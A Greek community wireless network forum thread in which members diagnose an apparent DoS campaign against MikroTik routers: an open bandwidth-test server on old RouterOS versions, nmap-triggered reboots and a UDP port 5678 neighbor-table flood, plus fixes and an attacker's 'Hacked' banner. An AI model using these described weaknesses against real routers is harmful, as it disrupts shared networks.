Μα εγω δεν διαφωνησα με το οτι το mtik logαρει το αποτυγχημενο login καλε μου ανθρωπε, ασε που το δοκιμασα πρωτα σε .27 και .30 .

Αυτο που τονισα ηταν το bug του bw test server, που κι εσυ το ειχες ορθανοιχτο οπως λες.

Να υποθεσω βεβαια οτι προληπτικα ενεργοποιησες κι εσυ πλεον το auth...  :: 

kiss fm

edit. και για το οτι δεν την πληρωσες κι εσυ, δεν νομιζω πως λεει κατι.
Ο router του Αλεξανδρου επισης δεν ειχε ενεργοποιημενο το auth, και δεν επηρρεασθηκε, οπως και αλλοι φανταζομαι.
Δεν γνωριζουμε ομως αν δεχθηκαν και καποιου ειδους attack...

----------


## JollyRoger

οχι, να υποθέσεις οτι το είχα ανέκαθεν με auth, απο τότε που έκανα τις σχετικές δοκιμές που έλεγα, και κάποια στιγμή τώρα πρόσφατα το είχα βγάλει και ξεχάσει χωρίς!  :: 

kiss γάλακτος  ::   ::

----------


## spirosco

> οχι, να υποθέσεις οτι το είχα ανέκαθεν με auth


Ετσι μπραβο  ::

----------


## JB172

Και ο router του LP17 ήταν χωρίς τσεκαρισμένο το authenticate και "router was rebooted without proper shutdown"
Ο δικός μου το ίδιο, αλλά δεν έπαθε κάτι.
Και οι 2 έχουμε mtik 2.9.27 + quagga + pptp

----------


## mojiro

αυγουστο & σεπτεμβριο δε καταγραφθηκαν στα logs αποτυχημενα bandwidth test logins στον πειραια/κορυδαλλο/νικαια/κλπ ...

----------


## c_access

Δεν ειναι λιγο περιεργο να γιναν τοσα πολλα reboots χωρις να καταγραψουν κατι τα logs? Εμενα με βαζει σε σκεψεις παντως και προβληματισμο.

----------


## mojiro

απο τη μια αυτος που το κανε θελει χοντρο καντηλιασμα

απο την αλλη ομως ειναι θεος και μας αναγκασε να δουμε
live το προβλημα και να το διορθωσουμε[/list]

----------


## JollyRoger

> απο την αλλη ομως ειναι θεος και μας αναγκασε να δουμε
> live το προβλημα και να το διορθωσουμε[/list]


γιατί είδαμε το πρόβλημα? Προσωπικά δεν έχω καταλάβει τι ήταν, κατάλαβες εσύ?...  ::

----------


## mojiro

> Αρχική Δημοσίευση από mojiro
> 
> απο την αλλη ομως ειναι θεος και μας αναγκασε να δουμε
> live το προβλημα και να το διορθωσουμε[/list]
> 
> 
> γιατί είδαμε το πρόβλημα? Προσωπικά δεν έχω καταλάβει τι ήταν, κατάλαβες εσύ?...


οχι προβλημα... αλλα τρυπα στους routers μας, δηλαδη οτι τεσπα
ειχαμε το btest server open free to all

----------


## NetTraptor

Ο μόνος γνωστός τρόπος να κάνει κανείς ανελέητα reboot σε MT είναι το nmap! έχει υποθει πολλές φορές στο forum. 

Το authenticate λύνει το πρόβλημα ή απλά έχουμε κλειστό το BWserver. Εγώ βέβαια προτείνω να είναι ανοιχτό at all times για troubleshooting ... αλλά άμα έχετε 2.9.6 ή 2.9.27 ... You are a ticking DoS bomb..

Το bug είναι σε παλιά Version (δυστυχώς δεν ξέρω μέχρι ποιο Version και δεν νομίζω ότι θα μάθουμε) ενώ στα καινούρια δεν δουλεύει το hack.

Θεωρώ ότι για αυτό και παίχτηκε λούπα ανάμεσα στους router που είναι 2.9.x updated ενώ κάποιοι ενδιάμεσοι (2.9.x affected) σε άλλους κόμβους ανεβοκατέβαιναν. Αρκετά Hop ποιο κάτω, έως ότου σκάσουν τα updated paths ήταν ήδη invalid γιατί τα affected μηχανάκια μέσα στα path ήταν εν μέσο Reboot.  ::  

αυτή είναι μια εικασία δικιά μου βέβαια... ο κύριος με το dude & το nmap script στα χέρια θα μας τα πει καλύτερα!  ::

----------


## JollyRoger

αν υποθέσουμε οτι ήταν συνειδητό καψόνι, πιστεύω οτι έχει γίνει γνωστός σε κάποιον κι άλλος τρόπος...  :: 

εκτός αν υπάρχει κάποιος τρόπος να scanαρεις ένα router πριν του κάνεις nmap, και να δεις αν έχει το auth ενεργοποιημένο....  :: 


μήπως τελικά ήταν θέμα bgp όπως είπε ο aci οτι παρατήρησε υψηλό load?...

μπάς και τεζάρανε routers με μικρά cpu?...


τι κοινό είχαν αυτοί που πέσανε?  ::

----------


## acoul

> τι κοινό είχαν αυτοί που πέσανε?


έχουν MikroTik !!

----------


## fengi1

κατι τετοιο παθαμε ;

http://www.netdisaster.com/go.php?mo.../www.awmn.net/

----------


## JollyRoger

::   ::   ::  τι 'ν' τουτου?  :: 

πάντως δεν νομίζω οτι θα μπορούσε να έχει σχέση!  ::

----------


## quam

Για την ιστορία...

αυτό που μου κάνει εντύπωση είναι πως τα δύο από τα τρία link μου πέσανε 3 και 3 φορές αντίστοιχα στο διάστημα 18:41 έως 19:08. Ο router του πρώτου έκανε reboot, γιατί δεν λάμβανα beacon για ενάμιση λεπτό. Φαντάζομαι και στο άλλο κάτι παρόμοιο μπορεί να συνέβει αλλά δεν είμαι σίγουρος γιατί στα 30" ακριβώς το link ήταν πάλι up. 
Το τρίτο link έπεσε 1 φορά στις 20:20. Μάλων όμως ήταν τυχαίο αν και σπάνια συμβαίνει κάτι τέτοιο.
Το πρώτο και το τελευταίο έχει σίγουρα quagga για το δεύτερο δεν γνωρίζω ακόμα.

Το routeri μου δεν έπεσε θύμα επίθεσης, τουλάχιστον αυτό λένε τα logs.
Όσο για το bgp δεν φαίνεται να είναι το πρόβλημα αυτού καθεαυτού.

Αν δεν βγει ο ίδιος που το έκανε να πεί τι έκανε, μόνο εικασίες μπορούμε να κάνουμε ειδικά όταν δεν υπάρχουν συγκεντρομένα logs από τις περιοχές που επλήγησαν. Εκτός αν θέλετε να δοκιμαστούν οι θεωρίες που αναφέρθηκαν από τους προηγούμενους σε ένα από τα θύματα του προχθεσινού αλλαλούμ  ::

----------


## quam

Φαίνεται πως κάποιος επιμένει να τσιμπάει ....  :: 

Μη βιάζεστε όμως δεν είναι ακριβώς αυτό που φαίνεται. Κάποιος κρίβεται πίσω από το vpn του ysam ή μήπως είναι κάτι χειρότερο ? 

Συγνώμη αλλά το δίκτυο 10.19.143.0 μόλις έφαγε πόρτα.

----------


## ckoukoumtzis

> Φαίνεται πως κάποιος επιμένει να τσιμπάει .... 
> 
> Μη βιάζεστε όμως δεν είναι ακριβώς αυτό που φαίνεται. Κάποιος κρίβεται πίσω από το vpn του ysam ή μήπως είναι κάτι χειρότερο ? 
> 
> Συγνώμη αλλά το δίκτυο 10.19.143.0 μόλις έφαγε πόρτα.


Ειχα ακριβως την ιδια εικονα στους neighbors φιλε μου και μολις εκανα disable τον pptp server εξαφανιστηκε....Απο την ιδια ip και με την ιδια identity....

----------


## JollyRoger

χααχχαχαχαχαχα... πήρα κι εγώ μια γύρα....

να 'σαι καλά φίλε που παίζεις, τι κρίμα που δεν κατάφερες να με κολήσεις ε?  :: 

pptp όμως δεν έχω!  ::

----------


## Vigor

Άλλο και τούτο...



```
Ulysses onwz U!!!

Version: Hacked
```

----------


## quam

Το παλικάρι τα έχει βάλει με τα m1krotikia.
Χτυπάει το port 5678 το οποίο γεμίζει με νέους γείτονες τον πίνακα αφού ο καθένας έχει διαφορετική MAC.

Δεν κάνει σε κανέναν εντύπωση η διεύθηνση που προέρχεται η επίθεση. Για spoofing δείχνει το πράγμα.  ::

----------


## JollyRoger

> Δεν κάνει σε κανέναν εντύπωση η διεύθηνση που προέρχεται η επίθεση ;


περιμένουμε το show!  :: 

πάντως εγώ μάζεψα 960κατι πακέτα... πρέπει να τα στέλνει σε σετάκια των 1000ων, και με 1000neighbors λογικά το MT κάνει κακάκια...

βέβαια ίσως μεγάλο cpu και μνήμη να το σώνουν, ή ίσως να μην με προτίμησε στην προηγούμενη γύρα  :: ....

btw το vpn του ysam δεν δίνει τέτοια διεύθυνση ε!  ::  ... ουτε καν τέτοιο c-class για την ακρίβεια...

αυτό είναι το παρών forum! xaxaxaxaxaxa....  ::  respect!

----------


## badge

Methinks I just shit my pants.... δεν τελειώνουν ποτέ, και το ερώτημα είναι αφού δεν αναπαραγάγονται, πώς διάολο πολλαπλασιάζονται;

A security hardening should be in order  ::

----------


## quam

> Methinks I just shit my pants.... δεν τελειώνουν ποτέ, και το ερώτημα είναι αφού δεν αναπαραγάγονται, πώς διάολο πολλαπλασιάζονται;
> 
> A security hardening should be in order


Το σίγουρο είναι πως ο τύπος είναι φανατικός αυτού του thread οπότε ρίχτε ότι έχετε ευχαρίστηση, θα τα λάβει αυτοπροσώπως. χαχαχαχα

Καταραμένη κλωνοποίηση  ::  
εκτός της μικρής διάρκειας ζωής πρέπει να έχεις και άλλες παρενέργειες.

Εγώ πάντως τον οικολογικό μου ρούτερ τον μάντρωσα με pure ACLs γιατί γουστάρει μάλλον τη διαφήμιση και προσπάθησε να επιτεθεί δυο τρεις φορές ακόμη.
Αλλά έμεινε με το χερούλι τις εξώπορτας  ::

----------


## mojiro

α μαλιστα...
ναι ειχα απειρα logs για 5768  ::

----------


## mojiro

επισης, εως τωρα να υποθεσω οτι στη neighbor list ειχατε ενεργα ολα τα interfaces ε?... ε τωρα αφηστε μονο τα wireless bb-links, οχι τα ap's

----------


## Cha0s

Όταν ζητάγαμε το range που δίνει το VPN μας λέγατε υπερβολικούς...  ::  

Μάλλον υπερ-βολεύτηκε όποιος το κάνει αυτό τώρα μιας και είναι το δίκτυο μας πιο μπάτε σκύλοι αλέστε από ποτέ.

----------


## mojiro

θα προτεινα να κλησει προσωρινα καθε ειδους gateway προς τα
μεσα απο το internet εως οτου βγει κατι που θα εξασφαλιζει και
καταγραφη των περιεργων οσο και την ασφαλεια μας.

----------


## socrates

> θα προτεινα να κλησει προσωρινα καθε ειδους gateway προς τα
> μεσα απο το internet εως οτου βγει κατι που θα εξασφαλιζει και
> καταγραφη των περιεργων οσο και την ασφαλεια μας.


+++

----------


## JollyRoger

εγώ θα πρότεινα να δημιουργήσουμα κάτι που να αναλογεί ΣΤΟ ΔΙΚΤΥΟ και να είναι ικανό να διαχειριστεί τέτοια θέματα που υπερβαίνουν τις αρμοδιότητες του συλλόγου....

διαφορετικά... ΟΤΙ και να λέμε εδώ, είναι βερεσέ...


ps.ρίχτα μεγάλε... ακόμα δεν έχω πέσει...  ::

----------


## NetTraptor

> θα προτεινα να κλησει προσωρινα καθε ειδους gateway προς τα
> μεσα απο το internet εως οτου βγει κατι που θα εξασφαλιζει και
> καταγραφη των περιεργων οσο και την ασφαλεια μας.


OK και πως θα το κάνουμε? 

Ορίστε ιδέες! ορίστε πέστε πως θα βοηθήσουν όλοι οι DEV μας στην σωστή παρακολούθηση Traffic, Accounting, Provisioning (είναι και της μόδας το άτιμο), Maintenance, development κτλ?

Να κάνω την αρχή? 

Traffic Flow server.
Centralized authentication
Accounting
Intelligent Firewalling και SPI
κτλ κτλ

Ορίστε project για όλους! Full support από εμάς! έχουν μπει κάποια θεμέλια αλλά το παιχνίδι είναι πααααρα πολύ αργό σε πολλά επίπεδα και από διαφορετικά στρατόπεδα! 

Θα μας βρείτε Αμερικής 17 και στα καλύτερα καφέ της πόλης... ελάτε με ιδέες και όρεξη για έργο! 

έως τότε κλείστε το BWtest ... θα βολέψει αφάνταστα την σταθερότητα του κόμβου σας ΑΝ δεν έχετε βάλει το χέρι στην τσέπη σαν καλά παιδιά...και ΑΝ δεν έχετε μεριμνήσει... η βάλτε Linux no problem by me... κόψτε το subnet στο input chain.. No good but if you are a target...  :: 

Είμαστε τόσο ορθάνοικτοι από το internet (που δεν νομίζω πρέπει να ξέρεις περί awmn, την IP του VPN και και και.... )όσο είμαστε ανοιχτοί και από τα access point! Μην κολλάμε στα προβοκάτσια του καθενός από εδώ μέσα που έσκασε από inet να κάνει ότι του καπνίσει... προφανώς είναι κάποιος που έχει άμεση σχέση με το awmn! ΑΝ είναι όντως από εκεί!

Επίσης να σημειώσω ότι μερικοί έχουν λάβει μέτρα πολύ ποιο πριν τα οποία προφυλάσσουν έστω και σε μικρο βαθμό τόσο την ασφάλεια όσο και την αξιοπρέπεια μας! Αν μη τι άλλο πέφτουμε σε παγίδες και καταρρίπτουμε το neutrality ... "Security is a responsibility at the end point" Δάσκαλε που δίδασκες?

Anyway είμαστε ανοιχτοί σε οποιαδήποτε πρόταση, πρόθυμοι ως προς την ανάθεση ουσιαστικών έργων και ευθυνών με κάθε backup στον βαθμό που είναι δυνατό! 

Αλήθεια τι περιμένουμε ανακοινώσεις, φαμφάρες και υποσχέσεις παρασήμων για να μαζευτούμε να κάνουμε το hobby μας...?  ::

----------


## JollyRoger

θα κάνουμε επιτέλους προσπάθεια να μαζώξουμε το δίκτυο?  ::

----------


## sokratisg

> ναι ειχα απειρα logs για 5768


Γιατί δεν τα διασταυρώνεις με τα logs του VPN server της Altec μήπως έκανε κάποιος από εκεί το hack attempt?

Τουλάχιστον να αρχίσουμε να μαζεύουμε τις τρύπες γιατί από τρύπες άλλο τίποτα....  ::

----------


## JollyRoger

μήπως μπορούμε και να 'χουμε κάπου κάποια δήλωση των c-classes που καταλήγουν στον ysam2?....

μόλις κοίταγα τα paths... και έχει ένα περίδρομο αδήλωτα c-classes τα οποία καταλήγουν στο AS 2801...  :: 


ps.guys, θα μαζώξουμε το δίκτυο? Ή κάνουμε κουβέντα σχετικά με το τι θα κάνουν (αν) τα 20 άτομα που θα διαβάσουν το παρών και ίσως να έχουν διάθεση να κάνουν κάτι στον δικό τους κόμβο?

----------


## Acinonyx

> μήπως μπορούμε και να 'χουμε κάπου κάποια δήλωση των c-classes που καταλήγουν στον ysam2?....
> 
> μόλις κοίταγα τα paths... και έχει ένα περίδρομο αδήλωτα c-classes τα οποία καταλήγουν στο AS 2801... 
> 
> 
> ps.guys, θα μαζώξουμε το δίκτυο? Ή κάνουμε κουβέντα σχετικά με το τι θα κάνουν (αν) τα 20 άτομα που θα διαβάσουν το παρών και ίσως να έχουν διάθεση να κάνουν κάτι στον δικό τους κόμβο?


Νομίζω αυτά είναι από άλλες κοινότητες. Έχουμε κάνει μία συζήτηση για την προτυποποίηση των διασύνδεσεων με άλλες κοινότητες σε αυτό το thread -> http://www.awmn/forum/viewtopic.php?t=32756 . Δεν υπήρχε καμία συμμετοχή από τους "αρμόδιους".

----------


## acoul

> Δεν υπήρχε καμία συμμετοχή από τους "αρμόδιους".


αρμόδιοι ??

----------


## badge

> αρμόδιοι ??


/me raises his hand

Όσον αφορά το 10.220.0.0/24 έκανα ερώτηση και ο mojiro απάντησε "είτε ο από εδώ είτε ο από εκεί". Πήρα λοιπόν την πρωτοβουλία να μην το βάλω στο task list μου. Αν όντως χρειάζεται να κάνω κάτι, στείλτε μου ένα pm και θα τσακιστώ να εκτελέσω.

----------


## john70

> εγώ θα πρότεινα να δημιουργήσουμα κάτι που να αναλογεί ΣΤΟ ΔΙΚΤΥΟ και να είναι ικανό να διαχειριστεί τέτοια θέματα που υπερβαίνουν τις αρμοδιότητες του συλλόγου......


Δηλαδή τι παραπάνω τί λιγότερο ? Τι μορφή θα έχει , άτομα , αρμοδιότητες . Τι παραπάνω θα καταφέρει, πώς θα το καταφέρει ? 

Μιχάλη ... Μπούρδες , ο σύλλογος μια χαρά είναι, τα resources είναι που κολλάνε  ::  Όταν δεν υπάρχει επαφή μεταξύ καρέκλας και γλουτών !

----------


## Cha0s

> Μιχάλη ... Μπούρδες , ο σύλλογος μια χαρά είναι, τα resources είναι που κολλάνε  Όταν δεν υπάρχει επαφή μεταξύ καρέκλας και γλουτών !


Και για τους ΝεοΔημοκράτες η Ν.Δ. μια χαρά είναι τώρα.
Απλά ο υπόλοιπος κόσμος δεν στρώνει κώλο  :: 


Είναι όλα μια χαρά.
Τόσο χαρούμενα που ούτε το μισό δίκτυο δεν είναι στον σύλλογο  ::

----------


## mojiro

> Αρχική Δημοσίευση από mojiro
> 
> θα προτεινα να κλησει προσωρινα καθε ειδους gateway προς τα
> μεσα απο το internet εως οτου βγει κατι που θα εξασφαλιζει και
> καταγραφη των περιεργων οσο και την ασφαλεια μας.
> 
> 
> OK και πως θα το κάνουμε? 
> 
> ...


εισαι υπερβολικος...

απλο κοψιμο τουτων για την ωρα και ενας ldap να καταγραφει το καθε login
χρειαζεται.

θες προσβαση με του ysam τα τουνελ ? οκ awmn acount εχεις ? οχι ? δε
περνας κυρια μαρια...

θα πει καποιος... ρεσυ ο συλλογος που θελει να εχει τον ελεγχο στα παντα
κλπ κλπ. τετοια μετρα αποδιδουν σε 2 κυματα, προλυπτικα (οπου το χασαμε)
αλλα και αποτρεπτικα (αφου την παθαμε) για να μην ξαναγινει.

δε γινεται ο ulysses και ο καθε τετοιος να εχει διπλα acounts να μας κανει
μπαχαλο και εμεις να καθομαστε με σταυρωμενα χερια.

απο πλευρας μου θα κανω οτι μπορω για να μην εχουμε προβληματα και
οχι να ελεγχω/παρακολουθω τι γινεται.

----------


## NetTraptor

@moj: Ναι OK αλλά ότι και αν είναι πρέπει να είναι πρακτικό!  ::  Όχι σαν εκείνη την περίπτωση των VPN accounts, τα DC Accounts, Τα access από εδώ access από εκεί...άλλο pass εδώ εκεί παραπέρα! που για να τα λάβει ένας σωστός απλός χρήστης πρέπει να κάνει εξέταση ούρων, να προσευχηθεί στον θεό των admin και να κάνει τον χορό του access... just and because there might be one idiot!

Για να δουλεψουν σωστες λυσεις που καλυπτουν τους παντες και εχουν minimum administration και complication overhead, θελει δουλεια... 
Με πασαλείμματα και βαριά καρδιά δεν γίνεται τίποτα!

Μην ξεχνάς οτι το VPN in είναι μια υπηρεσία για όλους η οποία δίνει άλλη δυναμική στο δίκτυο αλλά προσθέτει και ολίγη πολυπλοκότητα... Manage this...

Θέλεις να κάνουμε registration? ΟΚ.. ακόμα και αυτό... αλλά να μην μην κάνουμε την υπηρεσία άχρηστη και δυσκίνητη...

----------


## JollyRoger

> Μιχάλη ... Μπούρδες


Γιάννη... π@π@ριές....

so?... ωραία συζήτηση ε?...

ας προσπεράσω τις μπούρδες κι ας σου απαντήσω, οτι η μορφή είναι στο χέρι των μελών...

θέλουμε να προσπαθήσουμε τα απευθυνθούμε σε αυτά? ή αλλά λόγια ν'αγαπιόμαστε...?

όπως ας πούμε "δεν θέλουνε" κλπ χωρίς να τα ρωτήσουμε ποτέ, ή αναφερόμενοι σε κάτι που έγινε πριν 2-3 χρόνια που το δίκτυο ήταν το 1/4 του σημερινού?!




> Με πασαλείμματα και βαριά καρδιά δεν γίνεται τίποτα!


νομίζω ο άνθρωπος έβαλε όλο το νόημα σε αυτή την πρόταση...

οπότε ας το ξαναθέσω λίγο καλύτερα...

*θέλουμε να προσπαθήσουμε να οργανώσουμε το δίκτυο?*
απλό πράμα... 
ναι ή οχι... αν υπάρχει διάθεση, θα βρεθεί ο τρόπος...  ::  όταν υπάρχει θέληση, όλα γίνονται  ::

----------


## alasondro

> *θέλουμε να προσπαθήσουμε να οργανώσουμε το δίκτυο?*


Ναι! προτείνω να οργανώσουμε μια οργάνωση για την οργάνωση του δικτύου... jolly είσαι μέσα;

----------


## JollyRoger

ρε μλκ... έχεις κι εσύ την εντύπωση οτι μιλάω για να μιλάω όπως αρέσει σε μερικούς να υπενύσονται?...

ψήνεσαι or not? ...

----------


## alasondro

όχι ξέρω οτι οι προθέσεις σου είναι αγνές και τα εννοείς αλλά το αποτέλεσμα είναι λόγια...

----------


## mojiro

> @moj: Ναι OK αλλά ότι και αν είναι πρέπει να είναι πρακτικό!  Όχι σαν εκείνη την περίπτωση των VPN accounts, τα DC Accounts, Τα access από εδώ access από εκεί...άλλο pass εδώ εκεί παραπέρα! που για να τα λάβει ένας σωστός απλός χρήστης πρέπει να κάνει εξέταση ούρων, να προσευχηθεί στον θεό των admin και να κάνει τον χορό του access... just and because there might be one idiot!
> 
> Για να δουλεψουν σωστες λυσεις που καλυπτουν τους παντες και εχουν minimum administration και complication overhead, θελει δουλεια... 
> Με πασαλείμματα και βαριά καρδιά δεν γίνεται τίποτα!
> 
> Μην ξεχνάς οτι το VPN in είναι μια υπηρεσία για όλους η οποία δίνει άλλη δυναμική στο δίκτυο αλλά προσθέτει και ολίγη πολυπλοκότητα... Manage this...
> 
> Θέλεις να κάνουμε registration? ΟΚ.. ακόμα και αυτό... αλλά να μην μην κάνουμε την υπηρεσία άχρηστη και δυσκίνητη...


θα ειναι τοσο απλο οσο φτιαχνεις καπου ενα νεο acount
submit user-pass-mail
confirm mail
activated

----------


## JollyRoger

> όχι ξέρω οτι οι προθέσεις σου είναι αγνές και τα εννοείς αλλά το αποτέλεσμα είναι λόγια...


το αποτέλεσμα σχετικά με κάτι που αφορά το δίκτυο, δεν εξαρτάται απο 1 άτομο, ξεκόλα... 

και όταν ρωτάω αν υπάρχει διάθεση, το να πετάς εξυπνάδες που να υπενύσεσαι οτι δεν εννοώ αυτό που λέω, είναι προσβλητικό... τουλάχιστον απο σένα περιμένω καλύτερα...

----------


## quam

Ας μας διαφωτίσει κάποιος-κάποιοι για τα ακόλουθα.

1. Το πρόβλημα το είχαμε μέχρι χθες και σήμερα είμαστε εντάξει ?
2. Έχει δει κανείς τα logs του VPN και του server που hostarei το forum για σχετικές με το τρέχον θέμα εγγραφές ?
3. Αν ναι μπορεί να μας πει αν χρησιμοποιήθηκε κάποιο από τα δύο ανωτέρω ?
4. Υπάρχει τρόπος να θωρακιστούμε από αυτήν την επίθεση και αν ναι πως ?

Τωρά για το πως θα λύσετε γενικά τα προβλήματα περί authentication, security και το πως αυξάνω τα μέλη του συλόγου, έχω να προτείνω το εξής. .... Ανοίχτε μια καινούρια συζήτηση όμορφα και νοικοκυρεμένα  :: 

Και κάτι ακόμα μπορεί να μπεί στον τίτλο κάτι σχετικό με το port 5678 ?

thanks

----------


## JollyRoger

> Και κάτι ακόμα μπορεί να μπεί στον τίτλο κάτι σχετικό με το port 5678 ?


UDP port 5678 καλύτερα...  ::  ...

----------

